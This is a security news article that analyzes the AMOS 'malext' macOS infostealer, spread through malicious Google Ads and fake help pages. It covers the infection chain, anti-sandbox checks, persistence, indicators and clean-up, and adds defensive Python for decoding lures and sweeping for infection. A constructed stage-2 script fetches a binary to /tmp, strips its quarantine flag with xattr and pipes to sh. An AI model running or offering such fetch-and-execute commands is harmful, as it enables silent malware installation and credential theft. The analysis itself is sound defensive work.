A malvertising campaign is actively targeting macOS users worldwide with a new variant of the AMOS infostealer, tracked as "malext." The attackers buy Google Search ads that send victims to fake help articles hosted on free text-sharing platforms. The pages tell the reader to paste a terminal command that fetches and installs the infostealer without triggering a Gatekeeper warning, putting browser credentials, keychain contents and cryptocurrency wallets at risk.
The campaign came to light when a macOS user looking for help with storage cleanup clicked a top Google search result that led to a fake Medium blog post. The article looked legitimate and offered a supposedly helpful terminal command. The user grew suspicious only when the machine repeatedly asked for the administrator password, which a storage cleanup command has no reason to need; that hesitation stopped the compromise short and prompted an investigation.
Unveiling the AMOS ‘malext’ Infostealer Campaign
After the initial incident, computer enthusiast Gi7w0rm, working with researcher @itspappy, identified the malware. @itspappy had already been tracking macOS malware delivered through ClickFix-style lures tied to compromised Google Ads accounts. A review of Google's Ads Transparency Center turned up more than 34 active attack chains and over 53 hijacked Google Ads accounts spreading these lures. Operating at that scale points to an organized criminal group, most likely a "traffer" network, a crew that drives victims to a stealer operator's lures in return for a cut of the proceeds.
The attackers do not depend on a single hosting platform. Besides Medium, fake articles have turned up on Evernote, mssg.me and kimi.com, services that let anyone publish with little or no identity verification. When a malicious article is flagged and taken down, a replacement appears promptly, which points to a well-organized and persistent operation. Each page imitates a genuine help guide and walks the victim through a two-step procedure that ends with running the malicious terminal command.
The final payload, "malext," is a new variant of AMOS (Atomic macOS Stealer). The name comes from its command-and-control (C2) domain, malext[.]com, which is hardcoded in the samples. Once running, malext harvests browser credentials, Apple Notes, Safari cookies, cryptocurrency wallet data, Telegram session data and the macOS keychain. It can also backdoor the Ledger and Trezor wallet applications by quietly replacing them with trojanized builds, which gives the attackers a lasting hold on the victim's funds even after the initial theft.
Inside the Kill Chain: Infection and Persistence Mechanisms
The infection starts when the victim copies the terminal command from the lure page and pastes it into Terminal. The visible command is a base64-encoded curl request; decoding it reveals that it fetches a remote script which is itself gzip-compressed and then base64-encoded, so two layers have to be stripped before readable code appears. Once unpacked, the script downloads a Mach-O binary to /tmp and runs xattr -c on it, which clears every extended attribute on the file, including any com.apple.quarantine flag, so Gatekeeper never shows its "downloaded from the internet" warning and the binary executes without any visible prompt.
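To make the decoding step concrete, here is an added Python example (not code from the article or the researchers) that peels the base64 and gzip layers off a pasted command and pulls out the indicators a responder cares about: fetched URLs, /tmp paths, xattr quarantine stripping and pipes into a shell. The lure command and the stage-2 script in it are constructed for this example and use the placeholder host example.invalid; the campaign's real commands, URLs and file names are not reproduced here.

```python
import base64
import binascii
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b"
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# --- constructed sample (placeholders, not the campaign's real command) ----
# Stage 2: the remote script once both layers are removed. It mirrors the
# behaviour the article describes: drop a binary in /tmp, clear quarantine, run.
STAGE2_PLAIN = (
    "curl -fsSL https://example.invalid/dl/helper -o /tmp/.helper\n"
    "xattr -c /tmp/.helper\n"
    "chmod +x /tmp/.helper\n"
    "nohup /tmp/.helper >/dev/null 2>&1 &\n"
)
# The server would serve it gzip-compressed, then base64-encoded.
STAGE2_WRAPPED = base64.b64encode(gzip.compress(STAGE2_PLAIN.encode())).decode()

# Stage 1: what the lure page tells the victim to paste. One base64 layer hides
# the fetch / decode / decompress / execute pipeline.
STAGE1_INNER = "curl -fsSL https://example.invalid/api/v2 | base64 -d | gunzip | sh\n"
LURE_COMMAND = (
    "echo " + base64.b64encode(STAGE1_INNER.encode()).decode() + " | base64 -d | sh"
)


def looks_like_text(data: bytes) -> bool:
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\n\r\t" for ch in text)


def unwrap_layers(data: bytes, max_depth: int = 8) -> tuple:
    """Peel gzip and base64 layers until readable text remains.

    Returns (payload, layers); layers records the order removed, e.g.
    ["base64", "gzip"]. A base64 decode is only accepted when the result is
    gzip or printable text, so a plain script is never mangled.
    """
    layers = []
    for _ in range(max_depth):
        if data.startswith(GZIP_MAGIC):
            data = gzip.decompress(data)
            layers.append("gzip")
            continue
        compact = b"".join(data.split())          # tolerate wrapped blobs
        if not re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except binascii.Error:                     # bad alphabet or padding
            break
        if not (decoded.startswith(GZIP_MAGIC) or looks_like_text(decoded)):
            break
        data = decoded
        layers.append("base64")
    return data, layers


def extract_iocs(script: str) -> dict:
    """Pull the indicators a responder wants from a decoded shell script."""
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s'\"|;]+", script))),
        "tmp_paths": sorted(set(re.findall(r"/tmp/[\w.\-/]+", script))),
        "quarantine_strip": bool(
            re.search(r"\bxattr\s+(-c\b|-d\s+com\.apple\.quarantine)", script)
        ),
        "pipes_to_shell": bool(re.search(r"\|\s*(ba|z)?sh\b", script)),
    }


def analyze_blob(blob: str) -> dict:
    payload, layers = unwrap_layers(blob.encode())
    script = payload.decode("utf-8", errors="replace")
    return {"layers": layers, "script": script, "iocs": extract_iocs(script)}


def analyze_lure(command: str) -> dict:
    """Find the longest base64 blob in a pasted command and decode it."""
    blobs = B64_BLOB.findall(command)
    if not blobs:
        raise ValueError("no base64 blob found in command")
    return analyze_blob(max(blobs, key=len))


if __name__ == "__main__":
    for name, result in (("stage 1", analyze_lure(LURE_COMMAND)),
                         ("stage 2", analyze_blob(STAGE2_WRAPPED))):
        print(name, result["layers"], result["iocs"])
```

Run against a real lure, paste the command into analyze_lure and feed whatever the stage-1 URL serves (fetched from an isolated analysis box, not the victim) into analyze_blob; the layers list tells you how many encodings were stacked, and the IOC dictionary is what goes into the ticket.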
Before any stealing happens, the downloaded Mach-O binary, a universal build for both arm64 and x86-64, runs a virtual machine detection routine. The routine's strings are obfuscated with a Caesar cipher; once decoded they query system_profiler for virtualization vendors such as QEMU, VMware or KVM and examine hardware details typical of sandboxes, including placeholder board serial numbers and unusually old processor models. The check works: the sample did not detonate in the major macOS sandboxes, including the ones behind VirusTotal and Tria.ge, so analysts need bare-metal Apple hardware, or a patched sample, to observe the later stages.
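The VM-detection strings can be recovered without running the sample. The Python below is an added example, not code from the binary or the researchers: it brute-forces all 26 Caesar shifts and scores each candidate against keywords the article names (system_profiler, VMware, QEMU, KVM), then shows the kind of comparison the decoded strings enable by scanning a constructed system_profiler SPHardwareDataType listing for virtualization vendor strings and a placeholder serial number. The shift value, the exact command string, the SPHardwareDataType data type and the serial-number heuristic are assumptions for illustration; the article does not publish the sample's actual check.

```python
import re

# Keywords the article says the decoded check involves; SPHardwareDataType is
# the system_profiler section that carries model and serial data (assumed here).
KEYWORDS = ("system_profiler", "SPHardwareDataType", "VMware", "QEMU", "KVM")


def caesar_shift(text: str, shift: int) -> str:
    """Rotate ASCII letters by `shift`; digits, punctuation and spaces pass through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def keyword_score(text: str) -> int:
    low = text.lower()
    return sum(low.count(k.lower()) for k in KEYWORDS)


def crack_caesar(cipher: str) -> tuple:
    """Try every shift; return (shift, plaintext) with the most keyword hits."""
    best = max(range(26), key=lambda s: keyword_score(caesar_shift(cipher, -s)))
    return best, caesar_shift(cipher, -best)


# Constructed sample: a plausible check command, encoded with an arbitrary
# shift. For a real sample the analyst knows neither the string nor the shift.
PLAIN_SAMPLE = "system_profiler SPHardwareDataType | grep -iE 'VMware|QEMU|KVM'"
SAMPLE_SHIFT = 7
OBFUSCATED_SAMPLE = caesar_shift(PLAIN_SAMPLE, SAMPLE_SHIFT)

VM_VENDORS = ("vmware", "qemu", "kvm")   # vendors named in the article


def sandbox_indicators(profile: str) -> list:
    """Flag a hardware listing the way a check like this would (assumed heuristics)."""
    hits = []
    low = profile.lower()
    for vendor in VM_VENDORS:
        if vendor in low:
            hits.append(f"vendor:{vendor}")
    serial = re.search(r"Serial Number \(system\):\s*(\S+)", profile)
    if serial:
        value = serial.group(1)
        # "0", "None" or a repeated character are typical sandbox placeholders
        if value in ("0", "None", "Unknown") or len(set(value)) <= 2:
            hits.append("placeholder-serial")
    return hits


# Constructed SPHardwareDataType excerpts, not real captures.
SANDBOX_PROFILE = """Hardware:
    Hardware Overview:
      Model Name: Mac
      Model Identifier: VMware7,1
      Serial Number (system): 0
"""
REAL_PROFILE = """Hardware:
    Hardware Overview:
      Model Name: MacBook Pro
      Model Identifier: MacBookPro18,3
      Serial Number (system): C02XK1A2B3C4
"""

if __name__ == "__main__":
    print("obfuscated:", OBFUSCATED_SAMPLE)
    print("recovered: ", crack_caesar(OBFUSCATED_SAMPLE))
    print("sandbox:   ", sandbox_indicators(SANDBOX_PROFILE))
    print("real:      ", sandbox_indicators(REAL_PROFILE))
```

Keyword scoring is enough for a single-byte rotation over a known domain vocabulary; if a sample uses a different alphabet (rotating digits or punctuation too), adjust caesar_shift and the candidate range accordingly. Knowing which fields the check reads is also what lets you fix an analysis VM so the sample proceeds: a real-looking model identifier and serial number go a long way.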
When no sandbox is detected, the binary runs the main AppleScript payload, about 59,444 characters long. The script hides the Terminal window, collects hardware details and tries to obtain the macOS login password; if no stored credential is found, it shows a fake helper-installation dialog that asks the user to type it. It then works through browser profiles, cryptocurrency wallets, the macOS keychain, Telegram sessions and Apple Notes and zips everything for exfiltration. The primary exfiltration server is 38.244.158[.]56, with 199.217.98[.]33 as a backup. For persistence, the malware installs a LaunchDaemon plist named com.finder.helper.plist so the backdoor is relaunched at every boot; writing a LaunchDaemon requires root, which is why the chain needs the administrator password it keeps asking for.
macOS users should never paste terminal commands from online articles, however helpful they look; a "cleanup" command that asks for the administrator password is a red flag in itself. Keep Gatekeeper and System Integrity Protection enabled, and treat any Google result marked as an ad with extra caution. If an infection is suspected, act immediately: remove ~/.pass, ~/.agent, ~/.mainhelper and ~/.username, unload the LaunchDaemon com.finder.helper.plist with launchctl and delete it, reset every password saved in browsers and anything else held in the keychain, and reinstall any affected cryptocurrency wallet application from its official source. Because wallet data is among what the stealer collects, funds in any wallet that was on the machine should be moved to a freshly created one.
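As an added example (not from the article), the Python below sweeps a home directory and a LaunchDaemons directory for the indicators listed above, parses com.finder.helper.plist with plistlib to show what it launches, and emits the clean-up commands in the right order (unload the daemon before deleting it). It assumes the plist lives in /Library/LaunchDaemons and that its ProgramArguments points at ~/.mainhelper; both are assumptions used for the constructed infected layout built in a temporary directory, not facts from the article. Nothing is deleted; the commands are only returned for review.

```python
import plistlib
import tempfile
from pathlib import Path

# Indicators named in the article.
DROPPED_FILES = (".pass", ".agent", ".mainhelper", ".username")
PLIST_NAME = "com.finder.helper.plist"
# Assumed location: third-party LaunchDaemons are installed here (needs root).
DEFAULT_LAUNCH_DAEMONS = Path("/Library/LaunchDaemons")


def sweep(home: Path, launch_daemons: Path = DEFAULT_LAUNCH_DAEMONS) -> dict:
    """Report which malext indicators exist under the given directories."""
    findings = {"dropped_files": [], "launch_daemon": None}
    for name in DROPPED_FILES:
        path = home / name
        if path.exists():
            findings["dropped_files"].append(str(path))
    plist_path = launch_daemons / PLIST_NAME
    if plist_path.exists():
        try:
            with plist_path.open("rb") as fh:
                data = plistlib.load(fh)
        except (plistlib.InvalidFileException, ValueError):
            data = {}                      # still report the file, just unparsed
        findings["launch_daemon"] = {
            "path": str(plist_path),
            "label": data.get("Label"),
            "program": data.get("ProgramArguments") or data.get("Program"),
            "run_at_load": bool(data.get("RunAtLoad")),
        }
    return findings


def remediation_commands(findings: dict) -> list:
    """Shell commands to run, in order: unload the daemon, then remove files."""
    cmds = []
    daemon = findings["launch_daemon"]
    if daemon:
        cmds.append(f"sudo launchctl bootout system {daemon['path']}")
        cmds.append(f"sudo rm -f {daemon['path']}")
        program = daemon["program"]
        if isinstance(program, list) and program:
            cmds.append(f"rm -f {program[0]}")   # whatever the daemon launches
    for path in findings["dropped_files"]:
        cmd = f"rm -f {path}"
        if cmd not in cmds:
            cmds.append(cmd)
    return cmds


def build_constructed_infection(root: Path) -> tuple:
    """Lay out a fake infected system under root (constructed test data)."""
    home = root / "Users" / "victim"
    daemons = root / "Library" / "LaunchDaemons"
    home.mkdir(parents=True)
    daemons.mkdir(parents=True)
    (home / ".pass").write_text("hunter2\n")                 # constructed
    (home / ".mainhelper").write_bytes(b"\xcf\xfa\xed\xfe")  # Mach-O magic only
    plist = {
        "Label": "com.finder.helper",
        "ProgramArguments": [str(home / ".mainhelper")],     # assumed target
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    with (daemons / PLIST_NAME).open("wb") as fh:
        plistlib.dump(plist, fh)
    return home, daemons


def demo() -> dict:
    """Build the constructed layout in a temp dir, sweep it, return results."""
    root = Path(tempfile.mkdtemp(prefix="malext-demo-"))
    home, daemons = build_constructed_infection(root)
    findings = sweep(home, daemons)
    return {"findings": findings, "commands": remediation_commands(findings)}


if __name__ == "__main__":
    result = demo()
    print(result["findings"])
    for cmd in result["commands"]:
        print(cmd)
```

On a real machine call sweep(Path.home()) for each user account and review the commands before running them; if the plist's program path is something other than the dotfiles listed above, that path is a new indicator worth recording.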

